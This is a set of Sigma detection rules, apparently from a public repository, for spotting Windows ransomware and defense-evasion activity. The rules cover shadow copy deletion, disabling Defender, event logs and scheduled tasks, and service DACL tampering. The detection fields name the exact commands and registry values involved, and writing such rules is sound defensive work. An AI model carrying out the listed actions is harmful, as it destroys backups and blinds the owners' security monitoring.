title: Delete Important Scheduled Task
id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78
related:
    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog
      type: similar
    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog
      type: similar
status: test
description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-09
modified: 2026-03-11
tags:
    - attack.impact
    - attack.t1489
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\schtasks.exe'
        - OriginalFileName: 'schtasks.exe'
    selection_cli_delete:
        CommandLine|contains|windash: '/delete'
    selection_cli_task:
        CommandLine|contains:
            # Add more important tasks
            - '\Windows\BitLocker'
            - '\Windows\ExploitGuard'
            - '\Windows\SystemRestore\SR'
            - '\Windows\UpdateOrchestrator\'
            - '\Windows\Windows Defender\'
            - '\Windows\WindowsBackup\'
            - '\Windows\WindowsUpdate\'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_schtasks_delete/info.yml

title: Delete Volume Shadow Copies Via WMI With PowerShell
id: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1
status: stable
description: Shadow Copies deletion using operating systems utilities via PowerShell
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md
    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods
author: frack113
date: 2021-06-03
modified: 2023-10-27
tags:
    - attack.impact
    - attack.t1490
logsource:
    product: windows
    category: ps_classic_start
detection:
    selection:
        Data|contains|all:
            - 'Get-WmiObject'
            - 'Win32_ShadowCopy'
        Data|contains:
            - 'Delete()'
            - 'Remove-WmiObject'
    condition: selection
falsepositives:
    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
level: high

title: Deletion of Volume Shadow Copies via WMI with PowerShell
id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40
related:
    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e
      type: derived
    - id: c1337eb8-921a-4b59-855b-4ba188ddcc42
      type: similar
status: test
description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-20
modified: 2022-12-30
tags:
    - attack.impact
    - attack.t1490
logsource:
    category: process_creation
    product: windows
detection:
    selection_get:
        CommandLine|contains:
            - 'Get-WmiObject'
            - 'gwmi'
            - 'Get-CimInstance'
            - 'gcim'
    selection_shadowcopy:
        CommandLine|contains: 'Win32_ShadowCopy'
    selection_delete:
        CommandLine|contains:
            - '.Delete()'
            - 'Remove-WmiObject'
            - 'rwmi'
            - 'Remove-CimInstance'
            - 'rcim'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
id: c1337eb8-921a-4b59-855b-4ba188ddcc42
related:
    - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e
      type: derived
    - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40
      type: similar
status: test
description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
    - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
author: Tim Rauch, frack113
date: 2022-09-20
modified: 2022-12-02
tags:
    - attack.impact
    - attack.t1490
logsource:
    category: ps_script
    product: windows
detection:
    selection_get:
        ScriptBlockText|contains:
            - 'Get-WmiObject'
            - 'gwmi'
            - 'Get-CimInstance'
            - 'gcim'
    selection_shadowcopy:
        ScriptBlockText|contains: 'Win32_ShadowCopy'
    selection_delete:
        ScriptBlockText|contains:
            - '.Delete()'
            - 'Remove-WmiObject'
            - 'rwmi'
            - 'Remove-CimInstance'
            - 'rcim'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
id: 99cf1e02-00fb-4c0d-8375-563f978dfd37
related:
    - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering
      type: similar
    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique
      type: similar
status: test
description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
references:
    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
    - https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
author: Jonhnathan Ribeiro, oscd.community
date: 2020-10-16
modified: 2023-02-28
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1543.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_sc:
        - Image|endswith: '\sc.exe'
        - OriginalFileName: 'sc.exe'
    selection_sdset:
        CommandLine|contains|all:
            - 'sdset'
            - 'D;' # Deny Access
    selection_trustee:
        CommandLine|contains:
            - ';IU' # Interactively logged-on user
            - ';SU' # Service logon user
            - ';BA' # Built-in administrators
            - ';SY' # Local system
            - ';WD' # Everyone
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: Devcon Execution Disabling VMware VMCI Device
id: 85f520e7-6f5e-43ca-874c-222e5bf9c0de
status: experimental
description: |
    Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.
    This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.
    This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.
references:
    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon
    - https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060
    - https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV
    - https://huntress.com/blog/esxi-vm-escape-exploit
author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
date: 2026-01-02
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.defense-impairment
    - attack.t1543.003
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\devcon.exe'
        - OriginalFileName: 'DevCon.exe'
    selection_action:
        CommandLine|contains: ' disable '
    selection_vmci_pci:
        CommandLine|contains:
            - '15AD&DEV_0740' # VMware VMCI PCI device (Vendor 0x15AD = VMware, Device 0x0740 = VMCI)
            - 'VMWVMCIHOSTDEV' # VMware VMCI root host device driver name
    condition: all of selection_*
falsepositives:
    - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts.
    - Automated scripts in virtualized environments for device cleanup.
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml

title: Devtoolslauncher.exe Executes Specified Binary
id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6
status: test
description: The Devtoolslauncher.exe executes other binary
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/
    - https://twitter.com/_felamos/status/1179811992841797632
author: Beyu Denis, oscd.community (rule), @_felamos (idea)
date: 2019-10-12
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\devtoolslauncher.exe'
        CommandLine|contains: 'LaunchForDeploy'
    condition: selection
falsepositives:
    - Legitimate use of devtoolslauncher.exe by legitimate user
level: high

title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
id: ec8c4047-fad9-416a-8c81-0f479353d7f6
status: test
description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
references:
    - https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/
author: Greg (rule)
date: 2022-06-17
modified: 2023-02-17
tags:
    - attack.stealth
    - attack.t1202
    - cve.2022-30190
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\msdt.exe'
        ImageLoaded|endswith: '\sdiageng.dll'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Directory Service Restore Mode(DSRM) Registry Value Tampering
id: b61e87c0-50db-4b2e-8986-6a2be94b33b0
related:
    - id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
      type: similar
status: test
description: |
    Detects changes to "DsrmAdminLogonBehavior" registry value.
    During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
    Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
    If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
    If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
    If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
references:
    - https://adsecurity.org/?p=1785
    - https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/
    - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials
author: Nischal Khadgi
date: 2024-07-11
tags:
    - attack.credential-access
    - attack.persistence
    - attack.defense-impairment
    - attack.t1556
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Control\Lsa\DsrmAdminLogonBehavior'
    filter_main_default_value:
        Details: 'DWORD (0x00000000)' # Default value
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

title: Disable Important Scheduled Task
id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980
related:
    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog
      type: similar
    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog
      type: similar
status: test
description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task
    - https://twitter.com/MichalKoczwara/status/1553634816016498688
    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior
date: 2021-12-26
modified: 2026-03-11
tags:
    - attack.impact
    - attack.t1489
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\schtasks.exe'
        - OriginalFileName: 'schtasks.exe'
    selection_cli_disable:
        CommandLine|contains|windash: '/disable'
    selection_cli_task:
        CommandLine|contains:
            # Add more important tasks
            - '\Windows\BitLocker'
            - '\Windows\ExploitGuard'
            - '\Windows\ExploitGuard\ExploitGuard MDM policy Refresh'
            - '\Windows\SystemRestore\SR'
            - '\Windows\UpdateOrchestrator\'
            - '\Windows\Windows Defender\'
            - '\Windows\WindowsBackup\'
            - '\Windows\WindowsUpdate\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_schtasks_disable/info.yml
simulation:
    - type: atomic-red-team
      name: Windows - Disable the SR scheduled task
      technique: T1490
      atomic_guid: 1c68c68d-83a4-4981-974e-8993055fa034

title: Disable Macro Runtime Scan Scope
id: ab871450-37dc-4a3a-997f-6662aa8ae0f1
description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
status: test
date: 2022-10-25
modified: 2023-08-17
author: Nasreddine Bencherchali (Nextron Systems)
references:
    - https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
    - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope
    - https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba
tags:
    - attack.defense-impairment
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains|all:
            - '\SOFTWARE\'
            - '\Microsoft\Office\'
            - '\Common\Security'
        TargetObject|endswith: '\MacroRuntimeScanScope'
        Details: DWORD (0x00000000)
    condition: selection
falsepositives:
    - Unknown
level: high

title: Disable PUA Protection on Windows Defender
id: 8ffc5407-52e3-478f-9596-0a7371eafe13
status: test
description: Detects disabling Windows Defender PUA protection
references:
    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html
author: Austin Songer @austinsonger
date: 2021-08-04
modified: 2023-08-17
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Policies\Microsoft\Windows Defender\PUAProtection'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Disable Powershell Command History
id: 602f5669-6927-4688-84db-0d4b7afb2150
status: test
description: Detects scripts or commands that disabled the Powershell command history by removing psreadline module
references:
    - https://twitter.com/DissectMalware/status/1062879286749773824
author: Ali Alwashali
date: 2022-08-21
tags:
    - attack.stealth
    - attack.t1070.003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - Remove-Module
            - psreadline
    condition: selection
falsepositives:
    - Legitimate script that disables the command history
level: high

title: Disable Security Events Logging Adding Reg Key MiniNt
id: 919f2ef0-be2d-4a7a-b635-eb2b41fde044
status: test
description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.
references:
    - https://twitter.com/0gtweet/status/1182516740955226112
    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
author: Ilyas Ochkov, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1685.001
    - attack.t1112
    - car.2022-03-001
logsource:
    category: registry_event
    product: windows
detection:
    selection:
    # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one
        - TargetObject: 'HKLM\SYSTEM\CurrentControlSet\Control\MiniNt'
          EventType: 'CreateKey'    # we don't want deletekey
    # key rename
        - NewName: 'HKLM\SYSTEM\CurrentControlSet\Control\MiniNt'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Disable System Firewall
id: 53059bc0-1472-438b-956a-7508a94a91f0
status: test
description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
    - https://firewalld.org/documentation/man-pages/firewall-cmd.html
author: 'Pawel Mazur'
date: 2022-01-22
tags:
    - attack.defense-impairment
    - attack.t1686
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'SERVICE_STOP'
        unit:
            - 'firewalld'
            - 'iptables'
            - 'ufw'
    condition: selection
falsepositives:
    - Admin activity
level: high

title: Disable Windows Defender AV Security Monitoring
id: a7ee1722-c3c5-aeff-3212-c777e4733217
status: test
description: Detects attackers attempting to disable Windows Defender using Powershell
references:
    - https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
    - https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
author: 'ok @securonix invrep-de, oscd.community, frack113'
date: 2020-10-12
modified: 2022-11-18
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh_binary:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_pwsh_cli:
        CommandLine|contains:
            - '-DisableBehaviorMonitoring $true'
            - '-DisableRuntimeMonitoring $true'
    selection_sc_binary:
        - Image|endswith: '\sc.exe'
        - OriginalFileName: 'sc.exe'
    selection_sc_tamper_cmd_stop:
        CommandLine|contains|all:
            - 'stop'
            - 'WinDefend'
    selection_sc_tamper_cmd_delete:
        CommandLine|contains|all:
            - 'delete'
            - 'WinDefend'
    selection_sc_tamper_cmd_disabled:
        CommandLine|contains|all:
            - 'config'
            - 'WinDefend'
            - 'start=disabled'
    condition: all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)
falsepositives:
    - 'Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.'
level: high

title: Disable Windows Defender Functionalities Via Registry Keys
id: 0eb46774-f1ab-4a74-8238-1155855f2263
related:
    - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4
      type: obsolete
    - id: fd115e64-97c7-491f-951c-fc8da7e042fa
      type: obsolete
status: test
description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
references:
    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
    - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105
    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html
    - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html
    - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html
    - https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
date: 2022-08-01
modified: 2024-10-07
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    category: registry_set
detection:
    selection_main:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\Windows Defender\'
            - '\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\'
            - '\SOFTWARE\Policies\Microsoft\Windows Defender\'
    selection_dword_1:
        TargetObject|endswith:
            - '\DisableAntiSpyware'
            - '\DisableAntiVirus'
            - '\DisableBehaviorMonitoring'
            - '\DisableBlockAtFirstSeen'
            - '\DisableEnhancedNotifications'
            - '\DisableIntrusionPreventionSystem'
            - '\DisableIOAVProtection'
            - '\DisableOnAccessProtection'
            - '\DisableRealtimeMonitoring'
            - '\DisableScanOnRealtimeEnable'
            - '\DisableScriptScanning'
        Details: 'DWORD (0x00000001)'
    selection_dword_0:
        TargetObject|endswith:
            - '\DisallowExploitProtectionOverride'
            - '\Features\TamperProtection'
            - '\MpEngine\MpEnablePus'
            - '\PUAProtection'
            - '\Signature Update\ForceUpdateFromMU'
            - '\SpyNet\SpynetReporting'
            - '\SpyNet\SubmitSamplesConsent'
            - '\Windows Defender Exploit Guard\Controlled Folder Access\EnableControlledFolderAccess'
        Details: 'DWORD (0x00000000)'
    filter_optional_symantec:
        Image|startswith: 'C:\Program Files\Symantec\Symantec Endpoint Protection\'
        Image|endswith: '\sepWscSvc64.exe'
    condition: selection_main and 1 of selection_dword_* and not 1 of filter_optional_*
falsepositives:
    - Administrator actions via the Windows Defender interface
    - Third party Antivirus
level: high

title: Disable Windows Event Logging Via Registry
id: 2f78da12-f7c7-430b-8b19-a28f269b77a3
status: test
description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
references:
    - https://twitter.com/WhichbufferArda/status/1543900539280293889
    - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-04
modified: 2024-03-25
tags:
    - attack.defense-impairment
    - attack.t1685.001
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\'
        TargetObject|endswith: '\Enabled'
        Details: 'DWORD (0x00000000)'
    filter_main_wevutil:
        Image: 'C:\Windows\system32\wevtutil.exe' # FP generated during installation of manifests via wevtutil
    filter_main_iis:
        Image|startswith: 'C:\Windows\winsxs\'
        Image|endswith: '\TiWorker.exe'  # Many different TargetObjects
    filter_main_svchost:
        Image: 'C:\Windows\System32\svchost.exe'
        TargetObject|contains:
            - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter'
            - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\'
            - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\'
            - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\'
            - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-CAPI2/Operational\'
    filter_main_trusted_installer:
        Image: C:\Windows\servicing\TrustedInstaller.exe
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Compat-Appraiser'
    filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later
        Image: ''
    filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later
        Image: null
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting
level: high

title: Disable Windows IIS HTTP Logging
id: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e
status: test
description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging
author: frack113
date: 2022-01-09
modified: 2023-01-22
tags:
    - attack.defense-impairment
    - attack.t1685.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\appcmd.exe'
        - OriginalFileName: 'appcmd.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'set'
            - 'config'
            - 'section:httplogging'
            - 'dontLog:true'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: Disable of ETW Trace - Powershell
id: 115fdba9-f017-42e6-84cf-d5573bf2ddf8
related:
    - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
      type: derived
status: test
description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
references:
    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-28
modified: 2022-11-25
tags:
    - attack.stealth
    - attack.defense-impairment
    - attack.t1070
    - attack.t1685
    - car.2016-04-002
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_pwsh_remove:   # Autologger provider removal
        ScriptBlockText|contains: 'Remove-EtwTraceProvider '
    selection_pwsh_set:   # Provider “Enable” property modification
        ScriptBlockText|contains|all:
            - 'Set-EtwTraceProvider '
            - '0x11'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: high

title: Disable-WindowsOptionalFeature Command PowerShell
id: 99c4658d-2c5e-4d87-828d-7c066ca537c3
status: test
description: |
    Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md
    - https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
author: frack113
date: 2022-09-10
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmd:
        ScriptBlockText|contains|all:
            - 'Disable-WindowsOptionalFeature'
            - '-Online'
            - '-FeatureName'
    selection_feature:
        # Add any important windows features
        ScriptBlockText|contains:
            - 'Windows-Defender-Gui'
            - 'Windows-Defender-Features'
            - 'Windows-Defender'
            - 'Windows-Defender-ApplicationGuard'
            # - 'Containers-DisposableClientVM' # Windows Sandbox
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Disabled IE Security Features
id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424
status: test
description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
references:
    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
author: Florian Roth (Nextron Systems)
date: 2020-06-19
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains|all:
            - ' -name IEHarden '
            - ' -value 0 '
    selection2:
        CommandLine|contains|all:
            - ' -name DEPOff '
            - ' -value 1 '
    selection3:
        CommandLine|contains|all:
            - ' -name DisableFirstRunCustomize '
            - ' -value 2 '
    condition: 1 of selection*
falsepositives:
    - Unknown
level: high

title: Disabled Volume Snapshots
id: dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a
status: test
description: Detects commands that temporarily turn off Volume Snapshots
references:
    - https://twitter.com/0gtweet/status/1354766164166115331
author: Florian Roth (Nextron Systems)
date: 2021-01-28
modified: 2023-12-15
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\Services\VSS\Diag'
            - '/d Disabled'
    condition: selection
falsepositives:
    - Legitimate administration
level: high

title: Disabled Windows Defender Eventlog
id: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157
status: test
description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
references:
    - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2
author: Florian Roth (Nextron Systems)
date: 2022-07-04
modified: 2023-08-17
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational\Enabled'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
level: high

title: Disabling Multi Factor Authentication
id: 60de9b57-dc4d-48b9-a6a0-b39e0469f876
status: test
description: Detects disabling of Multi Factor Authentication.
references:
    - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/
author: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
date: 2023-09-18
tags:
    - attack.persistence
    - attack.credential-access
    - attack.defense-impairment
    - attack.t1556.006
logsource:
    service: audit
    product: m365
detection:
    selection:
        Operation|contains: 'Disable Strong Authentication.'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Disabling Windows Defender WMI Autologger Session via Reg.exe
id: a1b2c3d4-e5f6-a7b8-c9d0-e1f2a3b4c5d6
related:
    - id: f37b4bce-49d0-4087-9f5b-58bffda77316
      type: similar
status: experimental
description: |
    Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.
    By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events
    from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.
references:
    - https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/
    - https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session
    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/
    - https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions
author: Matt Anderson (Huntress)
date: 2025-07-09
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_reg_path:
        CommandLine|contains:
            - '\Control\WMI\Autologger\DefenderApiLogger\Start'
            - '\Control\WMI\Autologger\DefenderAuditLogger\Start'
    selection_reg_add:
        CommandLine|contains|all:
            - 'add'
            - '0'
    filter_main_enable:
        CommandLine|contains: '0x00000001'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Highly unlikely
level: high

title: Discovery Using AzureHound
id: 35b781cc-1a08-4a5a-80af-42fd7c315c6b
status: test
description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
references:
    - https://github.com/BloodHoundAD/AzureHound
author: Janantha Marasinghe
